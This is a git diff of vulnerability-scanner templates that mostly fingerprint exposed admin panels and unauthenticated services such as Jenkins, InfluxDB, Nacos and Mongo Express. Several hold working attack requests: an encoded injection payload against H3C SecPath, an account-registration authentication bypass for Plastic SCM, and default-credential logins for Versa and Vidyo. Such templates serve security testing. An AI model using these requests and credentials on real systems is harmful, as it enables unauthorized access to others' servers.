diff --git a/poc/auth/unauthenticated-frp-10895.yaml b/poc/auth/unauthenticated-frp-10895.yaml
new file mode 100644
index 0000000000..a970101294
--- /dev/null
+++ b/poc/auth/unauthenticated-frp-10895.yaml
@@ -0,0 +1,21 @@
+id: unauthenticated-frp
+info:
+ name: Unauthenticated FRP
+ author: pikpikcu
+ severity: info
+ reference:
+ - https://github.com/fatedier/frp/
+ tags: frp,unauth,panel
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/static/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "frps dashboard"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthenticated-frp-10896.yaml b/poc/auth/unauthenticated-frp-10896.yaml
index 33cf66b2af..804da1cc21 100644
--- a/poc/auth/unauthenticated-frp-10896.yaml
+++ b/poc/auth/unauthenticated-frp-10896.yaml
@@ -1,4 +1,5 @@
id: unauthenticated-frp
+
info:
name: Unauthenticated FRP
author: pikpikcu
@@ -6,16 +7,20 @@ info:
tags: frp,unauth,panel
reference:
- https://github.com/fatedier/frp/ # vendor homepage
+
requests:
- method: GET
path:
- "{{BaseURL}}/static/"
+
matchers-condition: and
matchers:
+
- type: word
words:
- "frps dashboard"
part: body
+
- type: status
status:
- 200
diff --git a/poc/auth/unauthenticated-frp-10897.yaml b/poc/auth/unauthenticated-frp-10897.yaml
deleted file mode 100644
index 804da1cc21..0000000000
--- a/poc/auth/unauthenticated-frp-10897.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: unauthenticated-frp
-
-info:
- name: Unauthenticated FRP
- author: pikpikcu
- severity: info
- tags: frp,unauth,panel
- reference:
- - https://github.com/fatedier/frp/ # vendor homepage
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/static/"
-
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "frps dashboard"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauthenticated-glowroot-10900.yaml b/poc/auth/unauthenticated-glowroot-10900.yaml
index 7b724ea0ac..91ec9e0d7d 100644
--- a/poc/auth/unauthenticated-glowroot-10900.yaml
+++ b/poc/auth/unauthenticated-glowroot-10900.yaml
@@ -1,15 +1,20 @@
id: unauthenticated-glowroot
+
info:
name: Glowroot Anonymous User
author: pussycat0x
severity: high
description: Anonymous user access allows to understand the host internals
- reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22
+ metadata:
+ max-request: 1
+ shodan-query: http.title:"Glowroot"
tags: misconfig,unauth,glowroot
-requests:
+
+http:
- method: GET
path:
- '{{BaseURL}}/backend/admin/users?username=anonymous'
+
matchers-condition: and
matchers:
- type: word
@@ -18,10 +23,14 @@ requests:
- '"Administrator"'
- '"newPassword":""'
condition: and
+
- type: word
words:
- "application/json"
part: header
+
- type: status
status:
- 200
+
+# digest: 490a00463044022019366c9de0a2a073adbbad6091fd850a52a5b2d56a5dd3ad2f0d39d9367bc01b02205cd93caca69d8f77cbf30f8643539c016d27c3a02de8520cbc25ede3a6a9e0e1:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauthenticated-glowroot-10902.yaml b/poc/auth/unauthenticated-glowroot-10902.yaml
index 91ec9e0d7d..9660fba7a7 100644
--- a/poc/auth/unauthenticated-glowroot-10902.yaml
+++ b/poc/auth/unauthenticated-glowroot-10902.yaml
@@ -5,12 +5,10 @@ info:
author: pussycat0x
severity: high
description: Anonymous user access allows to understand the host internals
- metadata:
- max-request: 1
- shodan-query: http.title:"Glowroot"
+ reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22
tags: misconfig,unauth,glowroot
-http:
+requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/users?username=anonymous'
@@ -32,5 +30,3 @@ http:
- type: status
status:
- 200
-
-# digest: 490a00463044022019366c9de0a2a073adbbad6091fd850a52a5b2d56a5dd3ad2f0d39d9367bc01b02205cd93caca69d8f77cbf30f8643539c016d27c3a02de8520cbc25ede3a6a9e0e1:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauthenticated-influxdb-10903.yaml b/poc/auth/unauthenticated-influxdb-10903.yaml
new file mode 100644
index 0000000000..4cd617572a
--- /dev/null
+++ b/poc/auth/unauthenticated-influxdb-10903.yaml
@@ -0,0 +1,27 @@
+id: unauthenticated-influxdb
+
+info:
+ name: Unauthentication InfluxDB Detection
+ author: pussycat0x
+ severity: high
+ metadata:
+ shodan-dork: InfluxDB
+ tags: unauth,db,influxdb,misconfig
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"results":'
+ - '"name":"databases"'
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/auth/unauthenticated-influxdb.yaml b/poc/auth/unauthenticated-influxdb.yaml
index 063d0eedc5..9725f2a6e7 100644
--- a/poc/auth/unauthenticated-influxdb.yaml
+++ b/poc/auth/unauthenticated-influxdb.yaml
@@ -1,4 +1,5 @@
id: unauthenticated-influxdb
+
info:
name: Unauthentication InfluxDB Detection
author: pussycat0x
@@ -6,10 +7,12 @@ info:
metadata:
shodan-dork: InfluxDB
tags: unauth,db,influxdb,misconfig
+
requests:
- method: GET
path:
- "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
matchers-condition: and
matchers:
- type: word
@@ -18,6 +21,7 @@ requests:
- '"results":'
- '"name":"databases"'
condition: and
+
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/poc/auth/unauthenticated-jenkins.yaml b/poc/auth/unauthenticated-jenkins.yaml
index 1d4e284352..6461e48741 100644
--- a/poc/auth/unauthenticated-jenkins.yaml
+++ b/poc/auth/unauthenticated-jenkins.yaml
@@ -1,23 +1,27 @@
-id: unauthenticated-jenkins
-
-info:
- name: Unauthenticated Jenkins Dashboard
- author: dhiyaneshDK
- severity: critical
- tags: jenkins
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - Dashboard [Jenkins]
- condition: and
-
- - type: status
- status:
- - 200
\ No newline at end of file
+id: unauthenticated-jenkins
+
+info:
+ name: Unauthenticated Jenkins Dashboard
+ author: dhiyaneshDK
+ severity: high
+ metadata:
+ max-request: 1
+ tags: jenkins
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - Dashboard [Jenkins]
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100811848566c0be01530924be02cd09bff4e6e70f54b2f9e5bf6d0f1818d8acd3a0220407f642622c3548af68ce0db4328b18a9d22cb1f916b7ed5c0e7ba7a000ac70e:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauthenticated-mongo-express.yaml b/poc/auth/unauthenticated-mongo-express.yaml
new file mode 100644
index 0000000000..6396514361
--- /dev/null
+++ b/poc/auth/unauthenticated-mongo-express.yaml
@@ -0,0 +1,23 @@
+id: unauthenticated-mongo-express
+info:
+ name: Mongo Express Unauthenticated
+ author: dhiyaneshDK,b0rn2r00t
+ severity: high
+ reference: https://www.exploit-db.com/ghdb/5684
+ tags: mongo,unauth
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/mongo-express/'
+ - '{{BaseURL}}/db/admin/system.users'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Home - Mongo Express'
+ - 'system.users - Mongo Express'
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthenticated-nacos-access-10912.yaml b/poc/auth/unauthenticated-nacos-access-10912.yaml
new file mode 100644
index 0000000000..38b6ac2224
--- /dev/null
+++ b/poc/auth/unauthenticated-nacos-access-10912.yaml
@@ -0,0 +1,40 @@
+id: unauthenticated-nacos-access
+
+info:
+ name: Nacos 1.x - Authentication Bypass
+ author: taielab,pikpikcu
+ severity: critical
+ description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
+ reference:
+ - https://github.com/alibaba/nacos/issues/4593
+ - https://nacos.io/en-us/docs/auth.html
+ tags: nacos,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
+ - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
+ headers:
+ User-Agent: Nacos-Server
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Content-Type: application/json"
+ part: header
+
+ - type: regex
+ regex:
+ - '"username":'
+ - '"password":'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/poc/auth/unauthenticated-nacos-access-10915.yaml b/poc/auth/unauthenticated-nacos-access-10915.yaml
deleted file mode 100644
index a5c75638f1..0000000000
--- a/poc/auth/unauthenticated-nacos-access-10915.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: unauthenticated-nacos-access
-
-info:
- name: Unauthenticated Nacos access v1.x
- author: taielab,pikpikcu
- severity: critical
- reference: https://github.com/alibaba/nacos/issues/4593
- tags: nacos,unauth
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
- - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
- headers:
- User-Agent: Nacos-Server
-
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "Content-Type: application/json"
- part: header
-
- - type: regex
- regex:
- - '"username":'
- - '"password":'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauthenticated-nacos-access.yaml b/poc/auth/unauthenticated-nacos-access.yaml
index c98d9ff317..a5c75638f1 100644
--- a/poc/auth/unauthenticated-nacos-access.yaml
+++ b/poc/auth/unauthenticated-nacos-access.yaml
@@ -1,10 +1,12 @@
id: unauthenticated-nacos-access
+
info:
name: Unauthenticated Nacos access v1.x
author: taielab,pikpikcu
severity: critical
reference: https://github.com/alibaba/nacos/issues/4593
tags: nacos,unauth
+
requests:
- method: GET
path:
@@ -12,18 +14,22 @@ requests:
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
headers:
User-Agent: Nacos-Server
+
matchers-condition: and
matchers:
+
- type: word
words:
- "Content-Type: application/json"
part: header
+
- type: regex
regex:
- '"username":'
- '"password":'
part: body
condition: and
+
- type: status
status:
- 200
diff --git a/poc/auth/unauthenticated-netdata.yaml b/poc/auth/unauthenticated-netdata.yaml
index 0dc974421a..124b15aaad 100644
--- a/poc/auth/unauthenticated-netdata.yaml
+++ b/poc/auth/unauthenticated-netdata.yaml
@@ -1,26 +1,35 @@
id: unauthenticated-netdata
+
info:
name: Unauthenticated Netdata
author: dhiyaneshDk
severity: medium
reference:
- https://github.com/netdata/netdata
+ metadata:
+ max-request: 1
tags: netdata,unauth,misconfig
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait"
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "view_update_every"
- "dimensions"
condition: and
+
- type: word
words:
- "application/json"
part: header
+
+# digest: 4b0a00483046022100fc4242ebf2407e638e79765a478f330a7ef8474097273a381389cc4462e12a41022100a924453e95fb7f0d51fbc8dc4f797de4e8a286c27aa3202bdd2723b995633c36:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauthenticated-popup-upload-10921.yaml b/poc/auth/unauthenticated-popup-upload-10921.yaml
new file mode 100644
index 0000000000..5e5ec46c65
--- /dev/null
+++ b/poc/auth/unauthenticated-popup-upload-10921.yaml
@@ -0,0 +1,21 @@
+id: unauthenticated-popup-upload
+info:
+ name: Unauthenticated Popup File Uploader
+ author: DhiyaneshDk
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/6671
+ tags: fileupload,upload
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/RichWidgets/Popup_Upload.aspx"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Popup Upload"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthenticated-popup-upload-10922.yaml b/poc/auth/unauthenticated-popup-upload.yaml
similarity index 100%
rename from poc/auth/unauthenticated-popup-upload-10922.yaml
rename to poc/auth/unauthenticated-popup-upload.yaml
diff --git a/poc/auth/unauthenticated-prtg-10924.yaml b/poc/auth/unauthenticated-prtg-10924.yaml
deleted file mode 100644
index 35a224af4b..0000000000
--- a/poc/auth/unauthenticated-prtg-10924.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: unauthenticated-prtg
-info:
- name: Unauthenticated PRTG Traffic Grapher
- author: dhiyaneshDK
- severity: high
- reference: https://www.exploit-db.com/ghdb/5808
- tags: config,unauth,prtg
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/sensorlist.htm"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'PRTG Traffic Grapher'
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauthenticated-prtg-10927.yaml b/poc/auth/unauthenticated-prtg-10927.yaml
new file mode 100644
index 0000000000..1444ba22bb
--- /dev/null
+++ b/poc/auth/unauthenticated-prtg-10927.yaml
@@ -0,0 +1,21 @@
+id: unauthenticated-prtg
+info:
+ name: Unauthenticated PRTG Traffic Grapher
+ author: dhiyaneshDK
+ severity: high
+ reference:
+ - https://www.exploit-db.com/ghdb/5808
+ tags: config,unauth,prtg
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sensorlist.htm"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'PRTG Traffic Grapher'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthenticated-zipkin.yaml b/poc/auth/unauthenticated-zipkin.yaml
deleted file mode 100644
index 31ddfe3077..0000000000
--- a/poc/auth/unauthenticated-zipkin.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: unauthenticated-zipkin
-info:
- name: Unauthenticated Zipkin
- author: dhiyaneshDk
- severity: high
- description: Unauthenticated access to Zipkin
- tags: unauth
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/config.json"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'application/json'
- part: header
- - type: word
- words:
- - environment
- - defaultLookback
- part: body
- condition: and
diff --git a/poc/auth/unauthenticated-zippkin.yaml b/poc/auth/unauthenticated-zippkin.yaml
index 7452622ed4..984ff7a602 100644
--- a/poc/auth/unauthenticated-zippkin.yaml
+++ b/poc/auth/unauthenticated-zippkin.yaml
@@ -1,23 +1,28 @@
id: unauthenticated-zippkin
+
info:
name: Unauthenticated Zippkin
author: dhiyaneshDk
severity: high
description: Unauthenticated access to Zippkin
tags: unauth
+
requests:
- method: GET
path:
- "{{BaseURL}}/config.json"
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- 'application/json'
part: header
+
- type: word
words:
- environment
diff --git a/poc/auth/unauthorized-h3csecparh-login-10948.yaml b/poc/auth/unauthorized-h3csecparh-login-10948.yaml
deleted file mode 100644
index a4d8964e36..0000000000
--- a/poc/auth/unauthorized-h3csecparh-login-10948.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: unauthorized-h3csecparh-login
-
-info:
- name: H3C Server - Unauthenticated Access
- author: ritikchaddha
- severity: high
- description: H3C server was able to be accessed with no authentication requirements in place.
- metadata:
- verified: true
- max-request: 1
- shodan-query: http.html:"H3C-SecPath-运维审计系统"
- fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
- tags: h3c,default-login,unauth,misconfig
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "admin"
- - "审计管理员"
- - "错误的id"
- condition: and
-
- - type: status
- status:
- - 200
-
-# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauthorized-h3csecparh-login.yaml b/poc/auth/unauthorized-h3csecparh-login.yaml
new file mode 100644
index 0000000000..c5b3c5cc9e
--- /dev/null
+++ b/poc/auth/unauthorized-h3csecparh-login.yaml
@@ -0,0 +1,29 @@
+id: unauthorized-h3csecparh-login
+info:
+ name: H3C Server - Unauthenticated Access
+ author: ritikchaddha
+ severity: high
+ description: H3C server was able to be accessed with no authentication requirements in place.
+ metadata:
+ verified: true
+ shodan-query: http.html:"H3C-SecPath-运维审计系统"
+ fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
+ tags: h3c,default-login,unauth
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "admin"
+ - "审计管理员"
+ - "错误的id"
+ condition: and
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/poc/auth/unauthorized-hp-printer-10951.yaml b/poc/auth/unauthorized-hp-printer-10951.yaml
new file mode 100644
index 0000000000..ef6191d59c
--- /dev/null
+++ b/poc/auth/unauthorized-hp-printer-10951.yaml
@@ -0,0 +1,20 @@
+id: unauthorized-hp-printer
+info:
+ name: Unauthorized HP Printer
+ author: pussycat0x
+ severity: high
+ tags: hp,iot,unauth
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/SSI/Auth/ip_snmp.htm"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "HP"
+ - "SNMP
"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthorized-plastic-scm-10956.yaml b/poc/auth/unauthorized-plastic-scm-10956.yaml
index d004b07584..6d7ae5c71c 100644
--- a/poc/auth/unauthorized-plastic-scm-10956.yaml
+++ b/poc/auth/unauthorized-plastic-scm-10956.yaml
@@ -1,5 +1,4 @@
id: unauthorized-plastic-scm
-
info:
name: Plastic Admin Console - Authentication Bypass
author: DEENA
@@ -9,13 +8,10 @@ info:
- https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
classification:
cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
+ cvss-score: 10.0
cwe-id: CWE-288
- metadata:
- max-request: 3
- tags: plastic,misconfig,intrusive
-
-http:
+ tags: plastic
+requests:
- raw:
- |
GET /account/register HTTP/1.1
@@ -32,7 +28,7 @@ http:
- |
GET /configuration HTTP/1.1
{{Hostname}}
-
+ cookie-reuse: true
extractors:
- type: regex
part: body
@@ -41,15 +37,14 @@ http:
name: csrf
regex:
- 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>'
-
matchers-condition: and
matchers:
- type: word
words:
- "Network - Plastic SCM"
part: body
-
- type: status
status:
- 200
-# digest: 4b0a00483046022100bea1d6873fe7545d710a21e89f24e4e08aac08e44c85065970e57b7e658204b0022100c320ab0788b27b5733e65ab3ebf0c685204cfefb35b31625b0353ed4faa01433:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+# Enhanced by mp on 2022/05/23
diff --git a/poc/auth/unauthorized-plastic-scm-10957.yaml b/poc/auth/unauthorized-plastic-scm-10957.yaml
deleted file mode 100644
index 6678abb0c6..0000000000
--- a/poc/auth/unauthorized-plastic-scm-10957.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: unauthorized-plastic-scm
-
-info:
- name: Unauthorized Access to Plastic Admin Console
- author: DEENA
- severity: critical
- tags: plastic
- reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
-
-requests:
- - raw:
- - |
- GET /account/register HTTP/1.1
- {{Hostname}}
-
- - |
- POST /account/register HTTP/1.1
- Host: {{Hostname}}
- Origin: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{BaseURL}}/account/register
- Connection: close
-
- Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false
-
- - |
- GET /configuration HTTP/1.1
- {{Hostname}}
-
- cookie-reuse: true
- extractors:
- - type: regex
- part: body
- internal: true
- group: 1
- name: csrf
- regex:
- - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Network - Plastic SCM"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml b/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml
new file mode 100644
index 0000000000..dd6e155d1a
--- /dev/null
+++ b/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml
@@ -0,0 +1,20 @@
+id: unauthorized-puppet-node-manager
+info:
+ name: Pupet Node Manager
+ author: pussycat0x
+ severity: medium
+ metadata:
+ fofa-dork: 'app="puppet-Node-Manager"'
+ tags: node,misconfig
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Nodes'
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml
deleted file mode 100644
index 1e411a7ba4..0000000000
--- a/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: unauthorized-puppet-node-manager
-
-info:
- name: Pupet Node Manager
- author: pussycat0x
- severity: medium
- metadata:
- fofa-dork: 'app="puppet-Node-Manager"'
- tags: node,misconfig
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Nodes'
-
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauthorized-puppet-node-manager-detect.yaml b/poc/auth/unauthorized-puppet-node-manager-detect.yaml
index 40d26ed618..1e411a7ba4 100644
--- a/poc/auth/unauthorized-puppet-node-manager-detect.yaml
+++ b/poc/auth/unauthorized-puppet-node-manager-detect.yaml
@@ -1,15 +1,14 @@
id: unauthorized-puppet-node-manager
info:
- name: Puppet Node Manager - Unauthorized Access
+ name: Pupet Node Manager
author: pussycat0x
severity: medium
metadata:
- max-request: 1
- fofa-query: 'app="puppet-Node-Manager"'
+ fofa-dork: 'app="puppet-Node-Manager"'
tags: node,misconfig
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}"
@@ -23,5 +22,3 @@ http:
- type: status
status:
- 200
-
-# digest: 490a004630440220302dd4f63ddce12168518f0d398d2001b6a88e5bad6b2bdf2c1efa53a3e07bcc022001a50f5a5ae1e1b1c75ecf741ac85fdf3261bb0743c83b20804801e51399ebe7:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/versa-default-login-11003.yaml b/poc/auth/versa-default-login-11003.yaml
index 5c02c869b2..48d4d86354 100644
--- a/poc/auth/versa-default-login-11003.yaml
+++ b/poc/auth/versa-default-login-11003.yaml
@@ -1,5 +1,4 @@
id: versa-default-login
-
info:
name: Versa Networks SD-WAN Application Default Login
author: davidmckennirey
@@ -11,11 +10,8 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
- metadata:
- max-request: 2
tags: default-login,versa,sdwan
-
-http:
+requests:
- raw:
- |
GET /versa/login.html HTTP/1.1
@@ -27,27 +23,26 @@ http:
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&sso=systemRadio
-
attack: pitchfork
payloads:
user:
- Administrator
pass:
- versa123
-
+ cookie-reuse: true
+ req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 302'
- - "contains(tolower(header_2), 'jsessionid')"
- - "contains(tolower(header_2), 'location: /versa/index.html')"
+ - "contains(tolower(all_headers_2), 'jsessionid')"
+ - "contains(tolower(all_headers_2), 'location: /versa/index.html')"
condition: and
-
- type: dsl
dsl:
- - "contains(tolower(header_2), '/login?error=true')"
- - "contains(tolower(header_2), '/login?tokenmissingerror=true')"
+ - "contains(tolower(all_headers_2), '/login?error=true')"
+ - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
negative: true
-# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950
+# Enhanced by mp on 2022/04/06
diff --git a/poc/auth/versa-default-login-11004.yaml b/poc/auth/versa-default-login-11004.yaml
index aef0b2dbe9..5c02c869b2 100644
--- a/poc/auth/versa-default-login-11004.yaml
+++ b/poc/auth/versa-default-login-11004.yaml
@@ -1,11 +1,21 @@
id: versa-default-login
+
info:
name: Versa Networks SD-WAN Application Default Login
author: davidmckennirey
severity: high
- description: Searches for default admin credentials for the Versa Networks SD-WAN application.
+ description: Versa Networks SD-WAN application default admin credentials were discovered.
+ reference:
+ - https://versa-networks.com/products/sd-wan.php
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ max-request: 2
tags: default-login,versa,sdwan
-requests:
+
+http:
- raw:
- |
GET /versa/login.html HTTP/1.1
@@ -17,24 +27,27 @@ requests:
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&sso=systemRadio
+
attack: pitchfork
payloads:
user:
- Administrator
pass:
- versa123
- cookie-reuse: true
- req-condition: true
+
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 302'
- - "contains(tolower(all_headers_2), 'jsessionid')"
- - "contains(tolower(all_headers_2), 'location: /versa/index.html')"
+ - "contains(tolower(header_2), 'jsessionid')"
+ - "contains(tolower(header_2), 'location: /versa/index.html')"
condition: and
+
- type: dsl
dsl:
- - "contains(tolower(all_headers_2), '/login?error=true')"
- - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
+ - "contains(tolower(header_2), '/login?error=true')"
+ - "contains(tolower(header_2), '/login?tokenmissingerror=true')"
negative: true
+
+# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/vidyo-default-login-11009.yaml b/poc/auth/vidyo-default-login-11009.yaml
deleted file mode 100644
index 670142a941..0000000000
--- a/poc/auth/vidyo-default-login-11009.yaml
+++ /dev/null
@@ -1,52 +0,0 @@
-id: vidyo-default-login
-info:
- name: Vidyo Default Login
- author: izn0u
- severity: medium
- description: test for default cred super:password
- reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
- tags: vidyo,default-login
-requests:
- - raw:
- - |
- GET /super/login.html?lang=en HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- - |
- POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Origin: {{BaseURL}}
- Referer: {{RootURL}}/super/login.html?lang=en
- Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
-
- username={{username}}&password={{password}}
- payloads:
- username:
- - super
- password:
- - password
- attack: pitchfork
- extractors:
- - type: regex
- name: csrf_tkn
- group: 1
- part: body
- internal: true
- regex:
- - 'csrf_tkn=([A-Za-z0-9.-]+)'
- - type: kval
- name: session
- internal: true
- part: header
- kval:
- - JSESSIONID
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "/super/index.html"
- - type: status
- status:
- - 302
diff --git a/poc/auth/vidyo-default-login.yaml b/poc/auth/vidyo-default-login-11010.yaml
similarity index 100%
rename from poc/auth/vidyo-default-login.yaml
rename to poc/auth/vidyo-default-login-11010.yaml
diff --git a/poc/auth/vigor-login-11020.yaml b/poc/auth/vigor-login-11020.yaml
new file mode 100644
index 0000000000..8a6f091a0a
--- /dev/null
+++ b/poc/auth/vigor-login-11020.yaml
@@ -0,0 +1,19 @@
+id: vigor-login
+info:
+ name: Vigor Login Page
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6610
+ tags: panel
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/weblogin.htm'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Vigor Login Page'
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/vigor-login-11023.yaml b/poc/auth/vigor-login-11023.yaml
deleted file mode 100644
index 03be72a99c..0000000000
--- a/poc/auth/vigor-login-11023.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: vigor-login
-info:
- name: Vigor Login Page
